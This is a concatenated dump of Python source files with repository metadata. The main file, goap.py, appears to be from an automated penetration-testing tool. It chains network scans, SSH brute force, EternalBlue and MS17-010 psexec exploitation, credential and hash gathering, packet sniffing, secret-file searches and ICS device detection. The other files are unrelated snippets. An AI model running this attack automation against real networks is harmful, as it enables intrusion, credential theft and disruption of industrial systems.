2020-07-19T18:45:23.000Z
|
import demistomock as demisto
from CommonServerPython import DemistoException
import re
def main(args):
value = args['value']
replace_with = args['replace_with']
output = list()
start = 0
try:
regex = re.compile(args['regex'])
except (re.error, TypeError):
raise DemistoException('Could not compile regex.')
for match in regex.finditer(value):
for index, _ in enumerate(match.groups(), start=1):
end = match.start(index)
output.append(value[start:end])
output.append(replace_with)
start = match.end(index)
output.append(value[start:]) # Handling the tail of the string
return ''.join(output)
if __name__ in ["__builtin__", "builtins", "__main__"]:
result = main(demisto.args())
demisto.results(result)
| 26.645161
| 67
| 0.641646
|
37739647da0aa5b389939212657056aa40eec476
| 26,237
|
py
|
Python
|
goap/goap.py
|
PowderKegTech/mushikago
|
f09da10275c6df0e1a6121118ea4036bd1f6ae9a
|
[
"Apache-2.0"
] | 29
|
2021-04-26T15:38:54.000Z
|
2021-12-15T04:03:00.000Z
|
goap/goap.py
|
PowderKegTech/mushikago
|
f09da10275c6df0e1a6121118ea4036bd1f6ae9a
|
[
"Apache-2.0"
] | 1
|
2022-02-17T09:48:46.000Z
|
2022-02-17T09:48:46.000Z
|
goap/goap.py
|
PowderKegTech/mushikago
|
f09da10275c6df0e1a6121118ea4036bd1f6ae9a
|
[
"Apache-2.0"
] | 7
|
2021-07-19T11:10:29.000Z
|
2021-12-13T00:36:44.000Z
|
from arsenal import arpscan
from arsenal import mynmap
from arsenal import msploit
from arsenal import masscan
from arsenal import ics_detect
from database import write_json
from database import attack_tree
from database import mushilogger
import json
import random
import subprocess
import copy
import pprint
from ipaddress import IPv4Network
from ipaddress import IPv4Interface
from ipaddress import IPv4Address
class GoapSymbol():
node = []
link = []
node_json = {}
node_id = 0
pre_node_id = 0
mushikago_ipaddr = ""
class_a = []
class_b = []
mode = ""
def __init__(self, actionfile):
print("init symbol..")
self.actions = self.load_action(actionfile)
if actionfile == "actions-it.json":
self.mode = "it"
elif actionfile == "actions-ics.json":
self.mode = "ics"
self.mushikago_ipaddr = self.get_ipaddr()
self.class_a.append('10.0.0.0')
for num in range(1, 256):
self.class_a.append(str(IPv4Address('10.0.0.0') + 65536*num))
self.class_b.append('172.16.0.0')
for num in range(1, 16):
self.class_b.append(str(IPv4Address('172.16.0.0') + 65536*num))
self.goal = {
"GoalSymbol_AttackIcs": True,
"GoalSymbol_GetLocalSecretInfo": True,
"GoalSymbol_GetNwSecretInfo": True
}
self.state = {
"Symbol_GetLanNodes": None,
"Symbol_TcpScan": None,
"Symbol_UdpScan": None,
"Symbol_IdentOs": None,
"Symbol_LateralMovement": None,
"Symbol_ArpPoisoning": None,
"Symbol_GetNetworkInfo": None,
"Symbol_DCCheck": None,
"Symbol_LogonUserInfo": None,
"Symbol_DomainUser": None,
"Symbol_LocalUser": None,
"Symbol_ValidUser": None,
"Symbol_CreateUser": None,
"Symbol_GetOsPatch": None,
"Symbol_PrivilegeEscalation": None,
"Symbol_ProcessInfo": None,
"Symbol_ProcessMigrate": None,
"Symbol_MainDriveInfo": None,
"Symbol_SearchMainDrive": None,
"Symbol_NwDriveInfo": None,
"Symbol_SearchNwDrive": None,
"GoalSymbol_GetLocalSecretInfo": None,
"GoalSymbol_GetNwSecretInfo": None,
"Symbol_PacketInfo": None,
"Symbol_GetIcsProtocol": None,
"Symbol_GetIcsDevice": None,
"GoalSymbol_AttackIcs": None
}
self.wjson = write_json.WriteJson()
self.wcsv = attack_tree.AttackTree()
self.pre_exe = None
self.mlogger = mushilogger.MushiLogger()
def load_action(self, actionfile):
with open(actionfile) as f:
return json.load(f)
def get_ipaddr(self):
try:
ipaddr = subprocess.check_output('ifconfig eth0 | grep "inet " | grep -oP \'inet [0-9]*\.[0-9]*\.[0-9]*\.[0-9]*\' | sed \'s/inet //\'', shell=True).decode('utf-8')
#print(res)
return ipaddr.replace('\n', '')
except:
print("get-ipaddr error!!")
def goap_plannning(self, goap_node):
available_action = []
plan = []
#print("goap planning start..")
self.mlogger.writelog("goap planning start..", "info")
for i in range(100):
#print("\n")
print("\ntake = {}\n".format(i))
#print("\n")
if (goap_node.state["GoalSymbol_AttackIcs"] == goap_node.goal["GoalSymbol_AttackIcs"] or goap_node.state["GoalSymbol_GetLocalSecretInfo"] == goap_node.goal["GoalSymbol_GetLocalSecretInfo"] or goap_node.state["GoalSymbol_GetNwSecretInfo"] == goap_node.goal["GoalSymbol_GetNwSecretInfo"]):
return plan
for key in goap_node.actions.keys():
match_count = 0
for symbol, value in goap_node.actions[key]["precond"].items():
#print("{}, {}, {}".format(key, symbol, value))
if (goap_node.state[symbol] == value):
match_count += 1
if (match_count == len(goap_node.actions[key]["precond"])):
#print("match!!")
available_action.append(key)
#print("available_action = {}".format(available_action))
self.mlogger.writelog("available plan = " + pprint.pformat(available_action, width=500, compact=True), "info")
if (len(available_action) == 0):
#print("No available action")
self.mlogger.writelog("No available action", "info")
exit(0)
# currentry, use Dijkstra algorithm
# A* or Dijkstra's algorithm or random
tmp = 100
tmp_list = []
for key in available_action:
if (goap_node.actions[key]["priority"] < tmp):
priority_key = key
tmp = goap_node.actions[key]["priority"]
tmp_list.clear()
tmp_list.append(priority_key)
elif (goap_node.actions[key]["priority"] == tmp):
tmp_list.append(key)
#print("tmp_list = {}".format(tmp_list))
#print("len(tmp_list) = {}".format(len(tmp_list)))
#for i in range(len(tmp_list)):
# if priority_key not in plan:
# break
while (True):
priority_key = random.choice(tmp_list)
if priority_key not in plan:
break
#print("{}, {}".format(priority_key, goap_node.actions[priority_key]))
#print("pre_choise_key = {}".format(pre_choise_key))
plan.append(priority_key)
available_action.clear()
#print("plan = {}".format(plan))
#print("state = {}".format(goap_node.state))
for key, value in goap_node.actions[priority_key]["effect"].items():
goap_node.state[key] = value
#print("key = {}, value = {}".format(key, value))
#print("state = {}".format(goap_node.state))
def select_target(self):
target_list = {}
performed_list = {}
for num in range(1, len(self.node)): # num 0 is mushikago
if self.node[num]["os"] == "Linux":
if self.node[num]["session"] == "" and self.node[num]["goap"]["Symbol_LateralMovement"] == None:
if len(self.node[num]["ports"]) > 0:
for port_num in range(0, len(self.node[num]["ports"])):
#if self.node[num]["ports"][port_num]["number"] == "22/tcp" and self.node[num]["ports"][port_num]["service"] == "ssh":
if self.node[num]["ports"][port_num]["number"] == "22/tcp" and self.node[num]["ports"][port_num]["service"] == "ssh":
target_list[self.node[num]["id"]] = num
else:
if self.mode == "it":
if self.node[num]["goap"]["Symbol_SearchMainDrive"] == None or self.node[num]["goap"]["Symbol_SearchNwDrive"] == None:
performed_list[self.node[num]["id"]] = num
elif self.mode == "ics":
if self.node[num]["goap"]["Symbol_GetIcsProtocol"] == None or self.node[num]["goap"]["Symbol_GetIcsDevice"] == None:
performed_list[self.node[num]["id"]] = num
if self.node[num]["os"] == "Windows":
if self.node[num]["session"] == "" and self.node[num]["goap"]["Symbol_LateralMovement"] == None:
target_list[self.node[num]["id"]] = num
else:
if self.mode == "it":
if self.node[num]["goap"]["Symbol_SearchMainDrive"] == None or self.node[num]["goap"]["Symbol_SearchNwDrive"] == None:
performed_list[self.node[num]["id"]] = num
elif self.mode == "ics":
if self.node[num]["goap"]["Symbol_GetIcsProtocol"] == None or self.node[num]["goap"]["Symbol_GetIcsDevice"] == None:
performed_list[self.node[num]["id"]] = num
print("target_list = {}".format(target_list))
print("performed_list = {}".format(performed_list))
if len(performed_list) != 0:
target, node_num = random.choice(list(performed_list.items()))
target_list.clear()
performed_list.clear()
#print("goap_state = {}".format(self.node[node_num]["goap"]))
return target, node_num, self.node[node_num]["goap"]
elif len(target_list) != 0:
target, node_num = random.choice(list(target_list.items()))
target_list.clear()
performed_list.clear()
#print("goap_state = {}".format(self.node[node_num]["goap"]))
return target, node_num, self.node[node_num]["goap"]
else:
return None, None, None
def plan_execute(self, goap_node, node_id, plan, target, node_num):
#print("plan = {}".format(plan))
self.mlogger.writelog("action plan = " + pprint.pformat(plan, width=500, compact=True), "info")
for p in plan:
print("execute action = {}".format(p))
if p == "arpscan":
if target == self.mushikago_ipaddr:
pre_node_id = node_id
arpscanInstance = arpscan.ArpScan()
node_id = arpscanInstance.execute_arpscan(self.node, self.link, node_id)
node_id = node_id + 1 # mushikago used
self.node_json['nodes'] = self.node
self.node_json['links'] = self.link
#print("node_json = {}".format(self.node_json))
#print("node_id = {}".format(node_id))
if self.pre_exe == None:
self.wcsv.write(["name", "parent", "ip", "mitre"])
target = self.node[0]["id"] # target to mushikago
self.wcsv.write(["T1120 (arpscan) - " + self.node[0]["id"], self.pre_exe, self.node[0]["id"], "T1120"])
self.pre_exe = "T1120 (arpscan) - " + self.node[0]["id"]
goap_node.state["Symbol_GetLanNodes"] = True
self.node[0]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
else:
exploit = msploit.MetaSploit()
nwaddr = IPv4Interface(target+'/16').network
exploit.execute_arpscan(str(nwaddr[0]), "/16", self.node, node_num)
pre_node_id = node_id
arpscanInstance = arpscan.ArpScan()
node_id = arpscanInstance.execute_arpscan_fm_mp(self.node, self.link, node_id, target)
self.wcsv.write(["T1120 (arpscan) - " + target, self.pre_exe, target, "T1120"])
goap_node.state["Symbol_GetLanNodes"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "tcpscan":
mynmapInstance = mynmap.MyNmap()
proxy = 0
for num in range(pre_node_id, node_id, 1):
mynmapInstance.execute_nmap(self.node[num]["id"], num, self.node, proxy)
#print("node_json = {}".format(self.node_json))
if self.pre_exe == "T1120 (arpscan) - " + self.node[0]["id"]: # If first tcpscan
self.wcsv.write(["T1046 (tcpscan) - " + self.node[0]["id"], self.pre_exe, self.node[0]["id"], "T1046, T1018"])
self.pre_exe = "T1046 (tcpscan) - " + self.node[0]["id"]
goap_node.state["Symbol_TcpScan"] = True
goap_node.state["Symbol_IdentOs"] = True
self.node[0]["goap"] = copy.deepcopy(goap_node.state)
else:
self.wcsv.write(["T1046 (tcpscan) - " + target, self.pre_exe, target, "T1046, T1018"])
goap_node.state["Symbol_TcpScan"] = True
goap_node.state["Symbol_IdentOs"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "exploit_lateral":
res = -1
# select exploit
if res != 0 and self.node[node_num]["os"] == "Linux":
exploit = msploit.MetaSploit()
res = exploit.execute_ssh_bruteforce(target, node_num, self.node)
if res != 0:
for num in range(1, len(self.node)):
if len(self.node[num]["local_account_pass"]) > 0:
value = iter(self.node[num]["local_account_pass"])
for account, password in zip(value, value):
exploit = msploit.MetaSploit()
res = exploit.execute_ms17_10_psexec(target, node_num, self.node, self.mushikago_ipaddr, account, password)
if res == 0:
break
else:
continue
if res != 0 and self.node[node_num]["os"] == "Windows":
for num in range(1, len(self.node)):
if len(self.node[num]["local_account_pass"]) > 0:
value = iter(self.node[num]["local_account_pass"])
for account, password in zip(value, value):
exploit = msploit.MetaSploit()
res = exploit.execute_ms17_10_psexec(target, node_num, self.node, self.mushikago_ipaddr, account, password)
if res == 0:
break
else:
continue
if res != 0 and self.node[node_num]["os"] == "Windows":
exploit = msploit.MetaSploit()
res = exploit.execute_eternalblue(target, node_num, self.node, self.mushikago_ipaddr)
if res == 0:
goap_node.state["Symbol_LateralMovement"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wcsv.write(["TA0008 (exploit_lateral) - " + target, self.pre_exe, target, "TA0008"])
self.pre_exe = "TA0008 (exploit_lateral) - " + target
self.wjson.write(self.node_json)
else:
goap_node.state["Symbol_LateralMovement"] = False
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wcsv.write(["TA0008 (exploit_lateral) - " + target, self.pre_exe, target, "TA0008"])
self.pre_exe = "TA0008 (exploit_lateral) - " + target
self.wjson.write(self.node_json)
#print("replanning...")
self.mlogger.writelog("replanning...", "info")
return node_id
"""
exploit.execute_bluekeep("10.1.200.5")
exploit.execute_incognito()
"""
elif p == "get_networkinfo":
exploit = msploit.MetaSploit()
exploit.execute_ipconfig(node_num, self.node)
exploit.execute_netstat(node_num, self.node)
self.wcsv.write(["T1016(get_networkinfo) - " + target, self.pre_exe, target, "T1016, T1049"])
goap_node.state["Symbol_GetNetworkInfo"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "get_processinfo":
exploit = msploit.MetaSploit()
exploit.execute_ps(node_num, self.node)
self.wcsv.write(["T1057 (get_processinfo) - " + target, self.pre_exe, target, "T1057, T1059"])
goap_node.state["Symbol_ProcessInfo"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "get_local_user":
exploit = msploit.MetaSploit()
exploit.execute_netuser(node_num, self.node)
exploit.get_hash(target, node_num, self.node)
self.wcsv.write(["T1087 (get_local_user) - " + target, self.pre_exe, target, "T1087"])
goap_node.state["Symbol_LocalUser"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "get_domain_user":
exploit = msploit.MetaSploit()
exploit.execute_netuserdomain(node_num, self.node)
exploit.execute_creds_tspkg(node_num, self.node)
self.wcsv.write(["T1087 (get_domain_user) - " + target, self.pre_exe, target, "T1087"])
goap_node.state["Symbol_DomainUser"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "get_ospatch":
exploit = msploit.MetaSploit()
exploit.execute_getospatch(node_num, self.node)
self.wcsv.write(["T1003 (get_ospatch) - " + target, self.pre_exe, target, "T1003, T1059, T1082"])
goap_node.state["Symbol_GetOsPatch"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "get_maindrvinfo":
exploit = msploit.MetaSploit()
secret_data = exploit.execute_getmaindrvinfo(node_num, self.node)
self.wcsv.write(["T1083 (get_maindrvinfo) - " + target, self.pre_exe, target, "T1083, TA0009, TA0010"])
goap_node.state["Symbol_MainDriveInfo"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "get_netdrvinfo":
exploit = msploit.MetaSploit()
exploit.execute_netuse(node_num, self.node)
self.wcsv.write(["T1083 (get_netdrvinfo) - " + target, self.pre_exe, target, "T1083, T1135"])
goap_node.state["Symbol_NetDriveInfo"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "get_local_secretinfo":
exploit = msploit.MetaSploit()
secret_data = exploit.execute_getlocalsecretinfo(node_num, self.node)
self.wcsv.write(["TA0009 (get_local_secretinfo) - " + target, self.pre_exe, target, "TA0009"])
if secret_data == 1:
goap_node.state["GoalSymbol_GetLocalSecretInfo"] = True
else:
goap_node.state["GoalSymbol_GetLocalSecretInfo"] = False
goap_node.state["Symbol_SearchMainDrive"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "get_nw_secretinfo":
secret_data = 0
if len(self.node[node_num]["network_drive"]) > 0:
exploit = msploit.MetaSploit()
secret_data = exploit.execute_getnwsecretinfo(node_num, self.node)
self.wcsv.write(["TA0009 (get_nw_secretinfo) - " + target, self.pre_exe, target, "TA0009"])
if secret_data == 1:
goap_node.state["GoalSymbol_GetNwSecretInfo"] = True
else:
goap_node.state["GoalSymbol_GetNwSecretInfo"] = False
goap_node.state["Symbol_SearchNwDrive"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "get_packetinfo":
exploit = msploit.MetaSploit()
if self.node[node_num]["os"] == "Windows":
exploit.execute_sniff_win(node_num, self.node)
elif self.node[node_num]["os"] == "Linux":
exploit.execute_sniff_linux(node_num, self.node)
self.wcsv.write(["T1040 (get_packetinfo) - " + target, self.pre_exe, target, "T1040"])
goap_node.state["Symbol_PacketInfo"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "detect_ics_protocol":
ics = ics_detect.IcsDetect()
ics.detect_protocol(node_num, self.node)
self.wcsv.write(["T1046 (detect_ics_protocol) - " + target, self.pre_exe, target, "T1046"])
goap_node.state["Symbol_GetIcsProtocol"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
elif p == "detect_ics_device":
ics = ics_detect.IcsDetect()
ics.detect_device(node_num, self.node)
self.wcsv.write(["T1120 (detect_ics_device) - " + target, self.pre_exe, target, "T1120"])
goap_node.state["Symbol_GetIcsDevice"] = True
self.node[node_num]["goap"] = copy.deepcopy(goap_node.state)
self.wjson.write(self.node_json)
#self.wjson.write(self.node_json)
#print("node = {}".format(self.node))
return node_id
def check_ipaddr(self, ipaddr):
for num in range(1, len(self.node)):
if ipaddr == self.node[num]["id"]:
return -1
return 0
def getip_from_ipconfig_info(self, num, ipaddr_list):
value = iter(self.node[num]["ipconfig_info"])
for ipaddr, netmask in zip(value, value):
if ipaddr != self.node[num]["id"]:
#print("ipaddr = {}, netmask = {}".format(ipaddr, netmask))
self.mlogger.writelog("ipaddr = " + ipaddr + ", netmask = " + netmask, "debug")
res = self.check_ipaddr(ipaddr)
if res == 0:
ipaddr_list[ipaddr] = num
def getip_from_netstat_info(self, num, ipaddr_list):
value = iter(self.node[num]["netstat_info"])
for ipaddr, port in zip(value, value):
if ipaddr != self.node[0]["id"]:
#print("ipaddr = {}, port = {}".format(ipaddr, port))
self.mlogger.writelog("ipaddr = " + ipaddr + ", port = " + port, "debug")
res = self.check_ipaddr(ipaddr)
if res == 0:
ipaddr_list[ipaddr] = num
def scan_from_network_info(self, ipaddr_list, getnw_list):
for num in range(1, len(self.node)):
if self.node[num]["session"] != "":
#print("session is exist = {}".format(self.node[num]["id"]))
self.mlogger.writelog("session is exist = " + self.node[num]["id"], "debug")
if self.node[num]["goap"]["Symbol_GetNetworkInfo"] == True:
if self.node[num]["ipconfig_info"] != "":
#print("ipconfig_info is exist = {}".format(self.node[num]["ipconfig_info"]))
self.mlogger.writelog("ipconfig_info is exist = " + pprint.pformat(self.node[num]["ipconfig_info"]), "debug")
self.getip_from_ipconfig_info(num, ipaddr_list)
if self.node[num]["netstat_info"] != "":
#print("netstat_info is exist = {}".format(self.node[num]["netstat_info"]))
self.mlogger.writelog("netstat_info is exist = " + pprint.pformat(self.node[num]["netstat_info"]), "debug")
self.getip_from_netstat_info(num, ipaddr_list)
else:
getnw_list.append(num)
else:
#print("session is nothing = {}".format(self.node[num]["id"]))
self.mlogger.writelog("session is nothing = " + self.node[num]["id"], "debug")
def force_get_networkinfo(self, goap_node, node_id, ipaddr_list, getnw_list):
for node_num in getnw_list:
print("get_networkinfo ipaddr = {}".format(self.node[node_num]["goap"]))
goap_node.state = copy.deepcopy(self.node[node_num]["goap"])
target = self.node[node_num]["id"]
plan = ["get_networkinfo"]
node_id = goap_node.plan_execute(goap_node, node_id, plan, target, node_num)
self.scan_from_network_info(ipaddr_list, getnw_list)
def segment_scan(self, exploit, nwscan, ipaddr, node_num, node_id, pre_node_id, private_ip):
nwaddr = IPv4Interface(ipaddr+'/16').network
#print("scan nwaddr = {}".format(nwaddr))
self.mlogger.writelog("scan nwaddr = " + str(nwaddr), "info")
#print("nwaddr_10[0] = {}".format(nwaddr[0]))
if private_ip == 10:
for scan_nwaddr in self.class_a:
exploit.setting_route(scan_nwaddr, "255.255.0.0", self.node[node_num]["session"])
node_id = nwscan.execute_masscan(scan_nwaddr+"/16", self.node[node_num]["id"], self.node, self.link, node_id)
if node_id > pre_node_id:
try:
delete_index = self.class_a.index(str(nwaddr[0]))
self.class_a.pop(delete_index)
except:
pass
break
elif private_ip == 172:
for scan_nwaddr in self.class_b:
exploit.setting_route(scan_nwaddr, "255.255.0.0", self.node[node_num]["session"])
node_id = nwscan.execute_masscan(scan_nwaddr+"/16", self.node[node_num]["id"], self.node, self.link, node_id)
if node_id > pre_node_id:
try:
delete_index = self.class_a.index(str(nwaddr[0]))
self.class_a.pop(delete_index)
except:
pass
break
elif private_ip == 192:
exploit.setting_route(scan_nwaddr, "255.255.0.0", self.node[node_num]["session"])
node_id = nwscan.execute_masscan(scan_nwaddr+"/16", self.node[node_num]["id"], self.node, self.link, node_id)
return node_id
def network_scan(self, node_id, goap_node):
#print("Starting a Network Scan...")
self.mlogger.writelog("Starting a Network Scan...", "info")
exploit = msploit.MetaSploit()
exploit.execute_socks()
ipaddr_list = {}
getnw_list = []
self.scan_from_network_info(ipaddr_list, getnw_list)
if len(ipaddr_list) == 0 and len(getnw_list) != 0:
print("getnw_list = {}".format(getnw_list))
self.force_get_networkinfo(goap_node, node_id, ipaddr_list, getnw_list)
if len(ipaddr_list) > 0:
print("ipaddr_list = {}".format(ipaddr_list))
for scan_ip, node_num in ipaddr_list.items():
print("scan_ip = {}, node_num = {}".format(scan_ip, node_num))
#exploit = msploit.MetaSploit()
exploit.setting_route(scan_ip, "255.255.255.255", self.node[node_num]["session"])
nwscan = masscan.MasScan()
node_id = nwscan.execute_masscan(scan_ip, self.node[node_num]["id"], self.node, self.link, node_id)
else:
session_exist_list = {}
#for num in range(1, len(self.node)):
for num in range(len(self.node)-1, -1, -1):
if self.node[num]["session"] != "":
session_exist_list[self.node[num]["id"]] = num
if (len(session_exist_list) > 0):
nwscan = masscan.MasScan()
pre_node_id = node_id
for ipaddr, node_num in session_exist_list.items():
print("scan_src_ipaddr= {}".format(ipaddr))
s2 = ipaddr.split('.')
if (s2[0] == "10"):
node_id = self.segment_scan(exploit, nwscan, ipaddr, node_num, node_id, pre_node_id, 10)
if node_id > pre_node_id:
break
elif (s2[0] == "172"):
node_id = self.segment_scan(exploit, nwscan, ipaddr, node_num, node_id, pre_node_id, 172)
if node_id > pre_node_id:
break
elif (s2[0] == "192"):
node_id = self.segment_scan(exploit, nwscan, ipaddr, node_num, node_id, pre_node_id, 192)
if node_id > pre_node_id:
break
else:
nwscan = masscan.MasScan()
pre_node_id = node_id
s2 = self.mushikago_ipaddr.split('.')
if (s2[0] == "10"):
node_id = self.segment_scan(exploit, nwscan, ipaddr, node_num, node_id, pre_node_id, 10)
elif (s2[0] == "172"):
node_id = self.segment_scan(exploit, nwscan, ipaddr, node_num, node_id, pre_node_id, 172)
elif (s2[0] == "192"):
node_id = self.segment_scan(exploit, nwscan, ipaddr, node_num, node_id, pre_node_id, 192)
self.wjson.write(self.node_json)
self.wcsv.write(["T1046 (network scan)", self.pre_exe, self.mushikago_ipaddr, "T1046"])
self.pre_exe = "T1046 (network scan)"
return node_id
| 36.139118
| 293
| 0.614285
|
d8dd6bfadb056408f98c24475be1fe9ce25d2c20
| 260
|
py
|
Python
|
show_df_as_html_table.py
|
NathanKr/pandas-playground
|
a5355c59cb61ca3a7dcce590ed42d56a6b943783
|
[
"MIT"
] | null | null | null |
show_df_as_html_table.py
|
NathanKr/pandas-playground
|
a5355c59cb61ca3a7dcce590ed42d56a6b943783
|
[
"MIT"
] | null | null | null |
show_df_as_html_table.py
|
NathanKr/pandas-playground
|
a5355c59cb61ca3a7dcce590ed42d56a6b943783
|
[
"MIT"
] | null | null | null |
import pandas as pd
import os
url = 'https://en.wikipedia.org/wiki/List_of_S%26P_500_companies'
snp500_df = pd.read_html(url)[0]
file_path = os.path.join('temp','snp500_df_to_html.html')
print(f'write snp500_df to {file_path}')
snp500_df.to_html(file_path)
| 23.636364
| 65
| 0.769231
|
02d408487f0686824a537a752d9cda4a49647270
| 1,358
|
py
|
Python
|
Ryven_NodeManager/Node.py
|
lidong1266/Ryven-Switch
|
68d1f71e81d6564196f44ca49d5903f06db6a4d9
|
[
"MIT"
] | 18
|
2021-01-18T09:52:41.000Z
|
2022-03-22T10:48:44.000Z
|
Ryven_NodeManager/Node.py
|
xamofb-xsk/Ryven
|
8c3dcc613098863ae9fb747e62c0bb9d9eb4cef1
|
[
"MIT"
] | null | null | null |
Ryven_NodeManager/Node.py
|
xamofb-xsk/Ryven
|
8c3dcc613098863ae9fb747e62c0bb9d9eb4cef1
|
[
"MIT"
] | 3
|
2021-01-18T09:49:42.000Z
|
2022-03-22T10:48:47.000Z
|
from PySide2.QtCore import QObject, Signal
class Node(QObject): # QObject inheritance for the Signal
"""All values are initial! They get set when nodes are imported but do not get synchronized yet when the
NodeContentWidget is being changed. When exporting, all info comes from the NodeContentWidget."""
title_changed = Signal()
def __init__(self, content_nodes_widget=None):
super(Node, self).__init__()
self.title = 'new node'
self.type = ''
self.description = ''
self.module_name = ''
self.class_name = None
self.design_style = ''
self.color = ''
self.has_main_widget = False
self.widget_position = ''
self.custom_input_widgets = []
self.custom_input_widget_metacodes = []
self.custom_input_widget_metacodes_file_paths = []
self.inputs = []
self.outputs = []
# src code
f = open('template files/node_instance_default_template.txt', 'r')
self.meta_code = f.read()
f.close()
self.meta_code_file_path = None
# main widget code
f = open('template files/main_widget_default_template.txt', 'r')
self.main_widget_meta_code = f.read()
f.close()
self.main_widget_meta_code_file_path = None
self.content_widget = content_nodes_widget
| 34.820513
| 108
| 0.642121
|
183196fb7a7256d985e673ffcbe4c86973729ed4
| 1,264
|
py
|
Python
|
snippets/applyF_filterG-function.midterm-exam-Problem8.py
|
coshkun/6.00.1x-MITx-Course-Training-Lab-Notes
|
63e755dc81fd50a7b1372074a4a73e50021a233b
|
[
"MIT"
] | null | null | null |
snippets/applyF_filterG-function.midterm-exam-Problem8.py
|
coshkun/6.00.1x-MITx-Course-Training-Lab-Notes
|
63e755dc81fd50a7b1372074a4a73e50021a233b
|
[
"MIT"
] | null | null | null |
snippets/applyF_filterG-function.midterm-exam-Problem8.py
|
coshkun/6.00.1x-MITx-Course-Training-Lab-Notes
|
63e755dc81fd50a7b1372074a4a73e50021a233b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 14 13:51:35 2017
@author: coskun
Midterm Exam > Problem 8
20.0 points possible (graded)
Implement the fuction meet below,
f,g,and L will be supplied by system
"""
#Sample Definitions
def f(i):
return i + 2
def g(i):
return i > 5
L = [0, -10, 5, 6, -4]
#Problem Snippet
def applyF_filterG(L, f, g):
"""
Assumes L is a list of integers
Assume functions f and g are defined for you.
f takes in an integer, applies a function, returns another integer
g takes in an integer, applies a Boolean function,
returns either True or False
Mutates L such that, for each element i originally in L, L contains
i if g(f(i)) returns True, and no other elements
Returns the largest element in the mutated L or -1 if the list is empty
"""
# Your code here
mList = []
tmp = 0
#Calc New List
for i in L:
if g(f(i)):
mList.append(i)
#Apply Mutation
L.clear()
for i in mList:
L.append(i)
#Calc Retun Value
if len(mList) == 0:
return -1
else:
for i in mList:
tmp = max(tmp, i)
return tmp
print(applyF_filterG(L, f, g))
print(L)
| 21.793103
| 75
| 0.599684
|
a1f3c3d4ddd343ecb1ca912124b175e1a14ae9cd
| 16,852
|
py
|
Python
|
environment.py
|
terraregina/BalancingControl
|
36330cc0a20ad1f2fbd3a8f87ef8fed98df3fb22
|
[
"MIT"
] | null | null | null |
environment.py
|
terraregina/BalancingControl
|
36330cc0a20ad1f2fbd3a8f87ef8fed98df3fb22
|
[
"MIT"
] | null | null | null |
environment.py
|
terraregina/BalancingControl
|
36330cc0a20ad1f2fbd3a8f87ef8fed98df3fb22
|
[
"MIT"
] | null | null | null |
"""This module contains various experimental environments used for testing
human behavior."""
import numpy as np
class GridWorld(object):
def __init__(self, Omega, Theta, Rho,
trials = 1, T = 10, initial_state = 2):
#set probability distribution used for generating observations
self.Omega = Omega.copy()
#set probability distribution used for generating rewards
self.Rho = Rho.copy()
#set probability distribution used for generating state transitions
self.Theta = Theta.copy()
#set container that keeps track the evolution of the hidden states
self.hidden_states = np.zeros((trials, T), dtype = int)
#set intial state
self.initial_state = initial_state
def set_initial_states(self, tau):
#start in lower corner
self.hidden_states[tau, 0] = self.initial_state
if tau%100==0:
print("trial:", tau)
def generate_observations(self, tau, t):
#generate one sample from multinomial distribution
o = np.random.multinomial(1, self.Omega[:, self.hidden_states[tau, t]]).argmax()
return o
def update_hidden_states(self, tau, t, response):
current_state = self.hidden_states[tau, t-1]
self.hidden_states[tau, t] = np.random.choice(self.Theta.shape[0],
p = self.Theta[:, current_state, int(response)])
def generate_rewards(self, tau, t):
#generate one sample from multinomial distribution
r = np.random.choice(self.Rho.shape[0], p = self.Rho[:, self.hidden_states[tau, t]])
return r
"""
test: please ignore
"""
class FakeGridWorld(object):
def __init__(self, Omega, Theta,
hidden_states, trials = 1, T = 10):
#set probability distribution used for generating observations
self.Omega = Omega.copy()
#set probability distribution used for generating state transitions
self.Theta = Theta.copy()
#set container that keeps track the evolution of the hidden states
self.hidden_states = np.zeros((trials, T), dtype = int)
self.hidden_states[:] = np.array([hidden_states for i in range(trials)])
def set_initial_states(self, tau):
#start in lower corner
self.hidden_states[tau, 0] = 1
#print("trial:", tau)
def generate_observations(self, tau, t):
#generate one sample from multinomial distribution
o = np.random.multinomial(1, self.Omega[:, self.hidden_states[tau, t]]).argmax()
return o
def update_hidden_states(self, tau, t, response):
current_state = self.hidden_states[tau, t-1]
self.hidden_states[tau, t] = np.random.choice(self.Theta.shape[0],
p = self.Theta[:, current_state, int(response)])
class MultiArmedBandid(object):
def __init__(self, Omega, Theta, Rho,
trials = 1, T = 10):
#set probability distribution used for generating observations
self.Omega = Omega.copy()
#set probability distribution used for generating rewards
# self.Rho = np.zeros((trials, Rho.shape[0], Rho.shape[1]))
# self.Rho[0] = Rho.copy()
self.Rho = Rho.copy()
#set probability distribution used for generating state transitions
self.Theta = Theta.copy()
self.nh = Theta.shape[0]
# self.changes = np.array([0.01, -0.01])
#set container that keeps track the evolution of the hidden states
self.hidden_states = np.zeros((trials, T), dtype = int)
self.trials = trials
def set_initial_states(self, tau):
#start in lower corner
